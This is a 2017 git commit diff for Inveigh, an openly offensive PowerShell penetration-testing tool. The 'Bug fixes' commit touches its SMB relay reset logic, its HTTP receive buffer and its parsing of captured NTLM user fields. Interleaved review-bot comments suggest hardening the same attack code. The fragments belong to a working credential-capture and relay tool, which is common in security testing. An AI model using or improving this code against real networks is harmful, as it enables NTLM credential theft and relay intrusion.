| author | Kevin Robertson <robertsonk@gmail.com> | 2017-02-22 21:28:27 -0500 | 
|---|---|---|
| committer | Kevin Robertson <robertsonk@gmail.com> | 2017-02-22 21:28:27 -0500 | 
| commit | 3e2fd57ba1c162d52b6406d4ec41f556bf5c5568 (patch) | |
| tree | c8e325206bc3279f7ab709ebda79bc5c5d4e95c3 | |
| parent | 475f82d7b3dffd36a913a14bd4073ec472c430f2 (diff) | |
Bug fixes
| -rw-r--r-- | Scripts/Inveigh-Relay.ps1 | 36 | ||||
| -rw-r--r-- | Scripts/Inveigh-Unprivileged.ps1 | 2 | 
2 files changed, 32 insertions, 6 deletions
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1 index ef5d74a..1dd1538 100644 --- a/Scripts/Inveigh-Relay.ps1 +++ b/Scripts/Inveigh-Relay.ps1 @@ -2367,8 +2367,8 @@ $HTTP_scriptblock =      :HTTP_listener_loop while ($inveigh.relay_running -and $HTTP_running)      {          $TCP_request = "" -        $TCP_request_bytes = New-Object System.Byte[] 1024 - +        $TCP_request_bytes = New-Object System.Byte[] 4096 +                  while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected)          {              Start-Sleep -m 10 @@ -2379,6 +2379,24 @@ $HTTP_scriptblock =              }          } +         +        if($relay_step -gt 0) +        { +            $relay_reset++ + +            if($relay_reset -gt 1) +            { +                $inveigh.console_queue.Add("SMB relay attack resetting") +                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay attack resetting")]) +                $SMB_relay_socket.Close() +                $relay_step = 0 +            } + +        } +        else +        { +            $relay_reset = 0 +        }          if($SSL)          { 
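Review bot: The new receive-buffer size `4096` at the top of `HTTP_listener_loop` is an unexplained literal, and the same literal is changed separately in Scripts/Inveigh-Unprivileged.ps1 (the `@@ -858` hunk). A one-line comment such as `# per-request receive buffer; 1024 was too small` would record the reason, which the commit message does not give, so the wording needs the author's confirmation. The line added directly after it contains only whitespace where the old file had an empty line; it can stay empty. The loop body continues outside the hunk, so how a request longer than the buffer is handled cannot be judged from here.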
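Review bot: `$SMB_relay_socket.Close()` in the new reset branch is called without checking that the variable holds an object; whether it can be `$null` at that point is not visible, but `if($SMB_relay_socket){$SMB_relay_socket.Close()}` costs nothing and avoids a method call on `$null`. The branch also has no comment explaining why the reset waits for `$relay_reset -gt 1` instead of acting on the first pass with `$relay_step -gt 0`; something like `# step still non-zero on a second consecutive pass: treat the exchange as stalled` would do, subject to the author confirming the intent. `$relay_reset` is not initialised in the visible lines, and the enclosing loop starts and ends outside the hunk.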
@@ -2578,11 +2596,20 @@ $HTTP_scriptblock =                      $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes                      $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes -                    $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes +                     +                    if($HTTP_NTLM_user_length -gt 0) +                    {     +                        $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes +                    } +                    else +                    { +                        $HTTP_NTLM_user_string = "" +                    } +                      $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes                      $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes                      $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes -                     +                      if($HTTP_NTLM_length -eq 24) # NTLMv1                      {                          $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" @@ -2650,7 +2677,6 @@ $HTTP_scriptblock =                      $NTLM_auth = $true                      $HTTP_client_close = $true                      $NTLM_challenge = "" -                    #$HTTP_raw_url_output = $true                      if($inveigh.SMB_relay -and $relay_step -eq 2)                      { diff --git a/Scripts/Inveigh-Unprivileged.ps1 b/Scripts/Inveigh-Unprivileged.ps1 index 3fe5dd7..991a8eb 100644 --- a/Scripts/Inveigh-Unprivileged.ps1 +++ b/Scripts/Inveigh-Unprivileged.ps1 
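Review bot: The zero-length guard is applied to the user field only; three lines further down, `$HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes` is still called with whatever length the request carried. `DataToString` is defined outside the hunk, so this is inferred from the fact that the commit needed the guard for the user field, but the host field presumably fails the same way when its length is 0. Wrapping it in the same `if($HTTP_NTLM_host_length -gt 0)` / `else { $HTTP_NTLM_host_string = "" }` pair keeps the two fields consistent. Neither field checks that offset plus length stays within `$HTTP_request_bytes.Length`, which is worth adding since both values are read from the request itself.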
@@ -858,7 +858,7 @@ $HTTP_scriptblock =      :HTTP_listener_loop while ($inveigh.unprivileged_running -and $HTTP_running)      {          $TCP_request = "" -        $TCP_request_bytes = New-Object System.Byte[] 1024 +        $TCP_request_bytes = New-Object System.Byte[] 4096          while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected)          {  |